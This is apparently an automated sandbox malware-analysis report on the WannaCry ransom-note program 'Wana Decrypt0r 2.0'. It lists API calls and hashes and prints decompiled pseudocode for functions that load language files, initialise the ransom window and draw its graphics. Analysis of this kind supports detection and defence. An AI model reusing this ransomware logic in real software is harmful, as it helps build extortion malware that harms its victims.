                                  • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                  • #567.MFC42(00000066,00000000), ref: 0040612F
                                  • #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                    • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                    • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                    • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                    • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                    • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                    • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                    • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                    • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                    • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                    • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                    • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                    • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                    • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                  • #567.MFC42(00000066,00000000), ref: 004061DF
                                  • #540.MFC42(00000066,00000000), ref: 004061F7
                                  • #540.MFC42(00000066,00000000), ref: 00406209
                                  • #540.MFC42(00000066,00000000), ref: 00406219
                                  • #540.MFC42(00000066,00000000), ref: 00406229
                                  • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                  • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                  • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                  • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                  • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                  • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                  • #860.MFC42(00421798), ref: 00406358
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                  • String ID: 0ZA$0ZA$0ZA$DZA
                                  • API String ID: 3237077636-3729005435
                                  • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                  • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                  • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406AE0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 64%
                                  			E00406AE0(void* __ecx) {
				char _v4;
				char _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v40;
				void* _v280;
				char _v284;
				char _v288;
				char _v292;
				void* _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				void* _v312;
				void* _v316;
				char** _t26;
				long _t30;
				void* _t31;
				char** _t32;
				void* _t56;
				intOrPtr _t58;
				void* _t60;

				_push(0xffffffff);
				_push(E00413E61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_t56 = __ecx;
				L00412DA6();
				_t26 =  &_v284;
				_push(_t26);
				_v4 = 0;
				L00412DD6(); // executed
				_push("msg\\");
				L00412CAA();
				_push("m_%s.wnry");
				_push(_t26);
				_push( &_v288);
				_v12 = 1;
				L00412CCE();
				sprintf( &_v292,  *_t26, _v304);
				_t60 = _t58 - 0x110 + 0xc;
				L00412CC2();
				_v24 = 0;
				L00412CC2();
				_t30 = GetFileAttributesA( &_v292); // executed
				if(_t30 == 0xffffffff) {
					_push("msg\\");
					L00412CAA();
					_push("m_%s.wnry");
					_push(_t30);
					_t32 =  &_v300;
					_v28 = 2;
					_push(_t32);
					L00412CCE();
					sprintf( &_v308,  *_t32, "English");
					_t60 = _t60 + 0xc;
					L00412CC2();
					_v40 = 0;
					L00412CC2();
				}
				_t31 = E00406CF0(_t56,  &_v292);
				_v28 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] = _v36;
				return _t31;
			}


























                                  0x00406ae0
                                  0x00406ae2
                                  0x00406aed
                                  0x00406aee
                                  0x00406afc
                                  0x00406b03
                                  0x00406b08
                                  0x00406b0f
                                  0x00406b10
                                  0x00406b1b
                                  0x00406b20
                                  0x00406b29
                                  0x00406b2e
                                  0x00406b37
                                  0x00406b38
                                  0x00406b39
                                  0x00406b41
                                  0x00406b59
                                  0x00406b5b
                                  0x00406b62
                                  0x00406b6b
                                  0x00406b73
                                  0x00406b7d
                                  0x00406b86
                                  0x00406b88
                                  0x00406b91
                                  0x00406b96
                                  0x00406b9b
                                  0x00406b9c
                                  0x00406ba0
                                  0x00406ba8
                                  0x00406ba9
                                  0x00406bbb
                                  0x00406bbd
                                  0x00406bc4
                                  0x00406bcd
                                  0x00406bd5
                                  0x00406bd5
                                  0x00406be1
                                  0x00406bea
                                  0x00406bf5
                                  0x00406c03
                                  0x00406c10

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                  • String ID: English$m_%s.wnry$msg\
                                  • API String ID: 3713669620-4206458537
                                  • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                  • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E00405A60(void* __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v140;
				void* _v928;
				void* _v932;
				void* _v936;
				void* _v1000;
				char _v1124;
				char _v1248;
				char _v1352;
				char _v1456;
				char _v1560;
				char _v1664;
				char _v1796;
				char _v1928;
				void* _v1992;
				void* _v2056;
				void* _v2120;
				char _v2212;
				char _v2216;
				intOrPtr _t144;

				_push(0xffffffff);
				_push(E00413A76);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t144;
				E0040B620(L"Wana Decrypt0r 2.0", 1);
				_push(0);
				L00412F08();
				L00412F02();
				L00412EFC();
				E004060E0( &_v2212, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
				L00412B72(); // executed
				_v8 = 0x1d;
				_v24 = 0x415a30;
				E00403F20( &_v24);
				_v8 = 0x1c;
				_v32 = 0x415a30;
				E00403F20( &_v32);
				_v8 = 0x1b;
				_v40 = 0x415a30;
				E00403F20( &_v40);
				_v8 = 0x1a;
				_v48 = 0x415a44;
				E00403F20( &_v48);
				_v8 = 0x19;
				_v56 = 0x415a44;
				E00403F20( &_v56);
				_v8 = 0x18;
				_v64 = 0x415a44;
				E00403F20( &_v64);
				_v8 = 0x17;
				_v72 = 0x415a44;
				E00403F20( &_v72);
				_v8 = 0x16;
				_v80 = 0x415a44;
				E00403F20( &_v80);
				_v8 = 0x15;
				_v88 = 0x415a44;
				E00403F20( &_v88);
				_v8 = 0x14;
				_v96 = 0x415a44;
				E00403F20( &_v96);
				_v8 = 0x13;
				_v104 = 0x415a44;
				E00403F20( &_v104);
				_v8 = 0x12;
				E00403F90( &_v112);
				_v8 = 0x11;
				E00403F90( &_v120);
				_v8 = 0x10;
				L00412CC2();
				_v8 = 0xf;
				L00412CC2();
				_v8 = 0xe;
				L00412CC2();
				_v8 = 0xd;
				L00412CC2();
				_v8 = 0xc;
				L00412EF6();
				_v8 = 0xb;
				E004050A0( &_v1124);
				_v8 = 0xa;
				E004050A0( &_v1248);
				_v8 = 9;
				E00404170( &_v1352);
				_v8 = 8;
				E00404170( &_v1456);
				_v8 = 7;
				E00404170( &_v1560);
				_v8 = 6;
				E00404170( &_v1664);
				_v8 = 5;
				E00405D90( &_v1796);
				_v8 = 4;
				E00405D90( &_v1928);
				_v8 = 3;
				L00412EF0();
				_v8 = 2;
				L00412EF0();
				_v8 = 1;
				L00412D4C();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return 0;
			}





































                                  0x00405a60
                                  0x00405a62
                                  0x00405a6d
                                  0x00405a6e
                                  0x00405a85
                                  0x00405a8a
                                  0x00405a8c
                                  0x00405a96
                                  0x00405a9b
                                  0x00405aa6
                                  0x00405ab3
                                  0x00405abe
                                  0x00405ac1
                                  0x00405ad2
                                  0x00405add
                                  0x00405ae4
                                  0x00405af0
                                  0x00405af8
                                  0x00405aff
                                  0x00405b0b
                                  0x00405b13
                                  0x00405b1a
                                  0x00405b2b
                                  0x00405b33
                                  0x00405b3a
                                  0x00405b46
                                  0x00405b4e
                                  0x00405b55
                                  0x00405b61
                                  0x00405b69
                                  0x00405b70
                                  0x00405b7c
                                  0x00405b84
                                  0x00405b8b
                                  0x00405b90
                                  0x00405b98
                                  0x00405ba6
                                  0x00405bb2
                                  0x00405bba
                                  0x00405bc1
                                  0x00405bcd
                                  0x00405bd5
                                  0x00405bdc
                                  0x00405be8
                                  0x00405bf0
                                  0x00405bf7
                                  0x00405c03
                                  0x00405c0b
                                  0x00405c17
                                  0x00405c1f
                                  0x00405c2b
                                  0x00405c33
                                  0x00405c3f
                                  0x00405c47
                                  0x00405c53
                                  0x00405c5b
                                  0x00405c67
                                  0x00405c6f
                                  0x00405c7b
                                  0x00405c83
                                  0x00405c8f
                                  0x00405c97
                                  0x00405ca3
                                  0x00405cab
                                  0x00405cb7
                                  0x00405cbf
                                  0x00405ccb
                                  0x00405cd3
                                  0x00405cdf
                                  0x00405ce7
                                  0x00405cf3
                                  0x00405cfb
                                  0x00405d07
                                  0x00405d0f
                                  0x00405d1b
                                  0x00405d23
                                  0x00405d2f
                                  0x00405d37
                                  0x00405d43
                                  0x00405d4b
                                  0x00405d54
                                  0x00405d5c
                                  0x00405d65
                                  0x00405d70
                                  0x00405d7f
                                  0x00405d8c

                                  APIs
                                    • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                    • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                    • Part of subcall function 0040B620: KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040B663
                                    • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                    • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                    • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                    • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                  • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                  • #2621.MFC42 ref: 00405A96
                                  • #6438.MFC42 ref: 00405A9B
                                    • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                  • #2514.MFC42 ref: 00405AC1
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                    • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                  • #800.MFC42 ref: 00405C33
                                  • #800.MFC42 ref: 00405C47
                                  • #800.MFC42 ref: 00405C5B
                                  • #800.MFC42 ref: 00405C6F
                                  • #781.MFC42 ref: 00405C83
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42 ref: 00405D37
                                  • #609.MFC42 ref: 00405D4B
                                  • #616.MFC42 ref: 00405D5C
                                  • #641.MFC42 ref: 00405D70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringCallbackDispatcherExitFindFocusProcessShowUser
                                  • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                  • API String ID: 1759550818-2594244635
                                  • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                  • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407A90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 307 407a90-407ab7 308 407bf4-407c28 #2385 307->308 309 407abd-407ac5 307->309 310 407ac7 309->310 311 407aca-407ad1 309->311 310->311 311->308 312 407ad7-407af9 call 404c40 #2514 311->312 315 407b72-407bef #2414 * 2 #800 #641 312->315 316 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 312->316 315->308 316->315
                                  C-Code - Quality: 68%
                                  			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v36;
				char _v44;
				char _v132;
				char* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				char _v160;
				intOrPtr _v164;
				char _v168;
				void* _v180;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E00413F17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t73 = _t72 - 0x80;
				_t70 = __ecx;
				if(_a4 == 0x1388) {
					_t43 = __ecx + 0x2f8;
					if(_t43 != 0) {
						_t43 =  *((intOrPtr*)(_t43 + 0x20));
					}
					if(_a8 == _t43) {
						_t44 = E00404C40( &_v132, 0);
						_v8 = 0;
						L00412B72();
						if(_t44 == 1) {
							_push("***");
							L00412CAA();
							_push("\t");
							_v8 = 1;
							L00412F68();
							_push( &_v44);
							L00412F62();
							_push(0x3b);
							_push(0xa);
							L00412F5C();
							_push(0x3b);
							_push(0xd);
							L00412F5C();
							_push(1);
							_v164 = _t73;
							L00412F56();
							E004082C0(_t70,  &_v168,  &_v160);
							_v44 = 0;
							L00412CC2();
						}
						_v4 = 2;
						_v20 = 0x415c00;
						_v136 =  &_v20;
						_v4 = 5;
						L00412D52();
						_v20 = 0x415bec;
						_v136 =  &_v32;
						_v32 = 0x415c00;
						_v4 = 6;
						L00412D52();
						_v32 = 0x415bec;
						_v4 = 2;
						L00412CC2();
						_v4 = 0xffffffff;
						L00412C86();
					}
				}
				_t42 = _a8;
				_push(_a12);
				_push(_t42);
				_push(_a4);
				L00412BAE(); // executed
				 *[fs:0x0] = _v24;
				return _t42;
			}


























                                  0x00407a96
                                  0x00407a98
                                  0x00407a9d
                                  0x00407aa2
                                  0x00407aa9
                                  0x00407ab5
                                  0x00407ab7
                                  0x00407abd
                                  0x00407ac5
                                  0x00407ac7
                                  0x00407ac7
                                  0x00407ad1
                                  0x00407add
                                  0x00407ae6
                                  0x00407af1
                                  0x00407af9
                                  0x00407afb
                                  0x00407b04
                                  0x00407b09
                                  0x00407b12
                                  0x00407b1a
                                  0x00407b27
                                  0x00407b28
                                  0x00407b2d
                                  0x00407b2f
                                  0x00407b35
                                  0x00407b3a
                                  0x00407b3c
                                  0x00407b42
                                  0x00407b47
                                  0x00407b50
                                  0x00407b55
                                  0x00407b5c
                                  0x00407b65
                                  0x00407b6d
                                  0x00407b6d
                                  0x00407b72
                                  0x00407b81
                                  0x00407b89
                                  0x00407b91
                                  0x00407b99
                                  0x00407ba2
                                  0x00407baa
                                  0x00407bae
                                  0x00407bba
                                  0x00407bc2
                                  0x00407bcb
                                  0x00407bd3
                                  0x00407bdb
                                  0x00407be4
                                  0x00407bef
                                  0x00407bef
                                  0x00407ad1
                                  0x00407bfb
                                  0x00407c09
                                  0x00407c0a
                                  0x00407c0b
                                  0x00407c0e
                                  0x00407c1b
                                  0x00407c28

                                  APIs
                                  • #2514.MFC42 ref: 00407AF1
                                  • #537.MFC42(***), ref: 00407B04
                                  • #941.MFC42(00421234,***), ref: 00407B1A
                                  • #939.MFC42(?,00421234,***), ref: 00407B28
                                  • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                  • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                  • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                  • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                  • #2385.MFC42(?,?,?), ref: 00407C0E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                  • String ID: ***$[A$[A
                                  • API String ID: 3659526348-3419262722
                                  • Opcode ID: 7b5a321b8fc36d37a949ca2324a4224a0761ed0f7d540cde034222370581aa5f
                                  • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                  • Opcode Fuzzy Hash: 7b5a321b8fc36d37a949ca2324a4224a0761ed0f7d540cde034222370581aa5f
                                  • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405580 Relevance: 27.2, APIs: 18, Instructions: 187windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 319 405580-4055c1 GetClientRect 320 4055c7-405664 #470 #1168 #8 #323 CreateCompatibleDC #1640 #2860 319->320 321 4057c9-4057e0 319->321 322 405666 320->322 323 405669-4056ac #5785 CreateSolidBrush FillRect 320->323 322->323 324 405770-405777 323->324 325 4056b2-405721 call 405110 BitBlt 323->325 326 405779 324->326 327 40577c-4057c4 #5785 #2405 DeleteObject * 2 #640 #755 324->327 330 405723-405729 325->330 331 40575b-40576a 325->331 326->327 327->321 330->324 332 40572b-40572d 330->332 331->324 331->325 332->331 333 40572f-405734 332->333 333->331 334 405736-40573a 333->334 334->324 335 40573c-405757 334->335 335->331
                                  C-Code - Quality: 78%
                                  			E00405580(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v28;
				char _v80;
				void* _v96;
				struct tagRECT _v112;
				signed int _v116;
				void* _v120;
				struct HDC__* _v140;
				long _v144;
				struct tagRECT _v160;
				char _v164;
				void* _v172;
				intOrPtr _v176;
				char _v188;
				int _v192;
				int _v196;
				int _v204;
				intOrPtr _v212;
				void* _v216;
				struct HBRUSH__* _v220;
				char _v224;
				intOrPtr _v228;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				signed int _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				int _v272;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				int _t78;
				long _t79;
				struct HBRUSH__* _t80;
				struct HDC__* _t84;
				char _t85;
				struct HBRUSH__* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t136;
				void* _t151;
				struct HBRUSH__* _t152;
				void* _t153;
				void* _t156;
				int _t160;
				intOrPtr _t162;

				_push(0xffffffff);
				_push(E00413943);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				_t156 = __ecx;
				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
				_t160 = 0;
				_v204 = 0;
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
				_v176 = _t108;
				if(_t108 != 0) {
					L00412DD0(); // executed
					_t79 =  *(_t156 + 0x50);
					_v8 = 0;
					_v164 = 0xffb53f;
					_v160.left = _t79;
					_v160.top = 0x674017;
					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
					_v160.bottom = 0;
					_v144 =  *(_t156 + 0x54);
					L00412E5A();
					_t80 =  *((intOrPtr*)(_t79 + 8));
					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
					_t152 = _t80;
					_v220 = _t152;
					L00412E54();
					asm("sbb eax, eax");
					_v28 = 1;
					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
					_push(_t84);
					L00412E4E();
					_push(_t152); // executed
					L00412DE2(); // executed
					if(_t84 != 0) {
						_t84 =  *(_t84 + 4);
					}
					_push(_t84);
					_t85 = _v224;
					_push(_t85);
					L00412E48();
					_v212 = _t85;
					_t153 = 0;
					_v252 = 1;
					_t86 = CreateSolidBrush( *(_t156 + 0x54));
					_v220 = _t86;
					FillRect(_v140,  &_v160, _t86);
					_t89 = 0;
					_v260 = 0;
					if(_t108 > 0) {
						do {
							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
							E00405110(_t156,  &_v188, _v224);
							asm("sbb eax, eax");
							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
							_t102 =  *((intOrPtr*)(_t156 + 0x74));
							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
							_t153 = _t153 + 1;
							if(_t153 != _t102) {
								goto L10;
							} else {
								_t136 =  *((intOrPtr*)(_t156 + 0x70));
								if(_t136 != 1) {
									if(_t153 != _t102) {
										goto L10;
									} else {
										_t104 = _t136;
										if(_t104 <= 1) {
											goto L10;
										} else {
											if(_v304 != _t104) {
												_t153 = 0;
												_t160 = 0;
												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
												_v304 = _v304 + 1;
												goto L10;
											}
										}
									}
								}
							}
							goto L11;
							L10:
							_t89 = _v296 + 1;
							_v296 = _t89;
						} while (_t89 < _v272);
					}
					L11:
					_t90 = _v228;
					if(_t90 != 0) {
						_t90 =  *((intOrPtr*)(_t90 + 4));
					}
					_push(_t90);
					_push(_v248);
					L00412E48();
					L00412E42();
					DeleteObject(_v264);
					_t78 = DeleteObject(_v244);
					_v80 = 0;
					L00412E3C();
					_v80 = 0xffffffff;
					L00412DB8();
				}
				 *[fs:0x0] = _v12;
				return _t78;
			}























































                                  0x00405580
                                  0x00405582
                                  0x0040558d
                                  0x0040558e
